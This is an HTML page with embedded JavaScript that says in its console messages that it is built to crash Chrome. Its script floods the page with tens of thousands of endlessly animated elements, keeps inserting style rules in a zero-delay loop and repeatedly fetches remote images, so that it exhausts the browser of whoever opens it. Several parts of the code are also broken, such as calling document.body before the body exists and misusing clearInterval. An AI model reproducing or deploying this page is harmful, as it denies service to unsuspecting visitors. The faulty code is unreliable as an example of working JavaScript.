<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
  html, body {
    margin: 0;
    padding: 0;
    width: 100vw;
    height: 100vh;
    overflow: hidden;
  }
  #crasher {
    position: fixed;
    top: 0;
    left: 0;
    width: 100vw;
    height: 100vh;
    z-index: 1;
  }
  .text {
    position: absolute;
    font-size: 10px;
    font-weight: bold;
    color: white;
    background-color: black;
    padding: 1px;
    margin: 0;
    border: 1px solid red;
    opacity: 0.5;
    animation: move 0.5s linear infinite;
  }
  @keyframes move {
    0% {
      transform: translate(0, 0);
    }
    100% {
      transform: translate(-100vw, -100vh);
    }
  }
</style>
<script>
  const crasher = document.createElement('div');
  crasher.id = 'crasher';
  document.body.appendChild(crasher);

  let i = 0;
  setInterval(() => {
    if (i === 50000) {
      clearInterval(this);
    } else {
      const textEl = document.createElement('div');
      textEl.className = 'text';
      textEl.innerHTML = `Crash Text ${i}`;
      crasher.appendChild(textEl);
      i++;
    }
  }, 1);

  setTimeout(() => {
    console.log('Crashing Chrome soon...');
    const interval = setInterval(() => {
      const styleSheet = document.styleSheets[0] || document.appendChild(document.createElement('style'));
      styleSheet.insertRule(`
        .text:nth-child(${Math.floor(Math.random() * 50000) + 1}) {
          animation: none;
          opacity: 1;
          transform: translate(${Math.random() * 100}px, ${Math.random() * 100}px);
        }
      `);
      const randomImage = document.createElement('img');
      randomImage.src = `https://source.unsplash.com/random?city,night`;
      crasher.appendChild(randomImage);
    }, 0);
    setTimeout(() => clearInterval(interval), 5000);
  }, 1000);

  setTimeout(() => {
    console.log('Crashing Chrome now!');
    while (crasher.firstChild) {
      crasher.removeChild(crasher.firstChild);
    }
    for (let j = 0; j < 50000; j++) {
      const textEl = document.createElement('div');
      textEl.className = 'text';
      crasher.appendChild(textEl);
    }
  }, 5000);

  console.log('Crashing Chrome with 50000 text elements!');
</script>
<body>
<div id="crasher"></div>
</body>
</html>
